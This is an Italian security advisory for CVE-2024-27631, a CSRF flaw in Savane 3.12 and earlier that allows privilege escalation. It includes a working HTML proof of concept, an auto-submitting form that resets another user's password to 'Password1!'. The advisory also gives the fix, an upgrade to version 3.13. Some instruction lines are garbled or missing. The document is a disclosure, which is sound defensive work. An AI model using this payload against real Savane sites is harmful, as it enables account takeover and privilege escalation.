
CVE-2024–27631 Riferimento
In Savane v3.12 e precedenti, la mancanza di protezione CSRF sulle funzioni amministrative può consentire l'escalation dei privilegi e/o il furto di account. In particolare, l'endpoint /siteadmin/usergroup.php include la funzionalità per cambiare le password e i flag amministrativi di altri utenti, permettendo di fatto a un attaccante di rendersi amministratore.
Altri endpoint notevoli vulnerabili a CSRF includono:
Classificazione CWE: CWE-352: Cross-Site Request Forgery (CSRF)
Segnalato da: Ally Petitt
Prodotto interessato: Savane
Versioni interessate: 3.12 e precedenti
Questa è una Proof-of-Concept (PoC) per cambiare la password dell'account di un altro utente come percorso per il furto dell'account.
/users/<username>).<savane_instance> con il nome di dominio/host appropriato.<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">
<input name="form_pw" type="hidden" value="Password1!" />
<input name="form_pw2" type="hidden" value="Password1!" />
<input name="user_id" type="hidden" value="<user_id>" />
<input name="update" type="hidden" value="Update" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("autosubmit").submit();
</script>
Password1!.Nota che questo script PoC è stato testato su Firefox v103.0 (64-bit).
Aggiornare a Savane versione 3.13 o superiore. La patch si trova qui.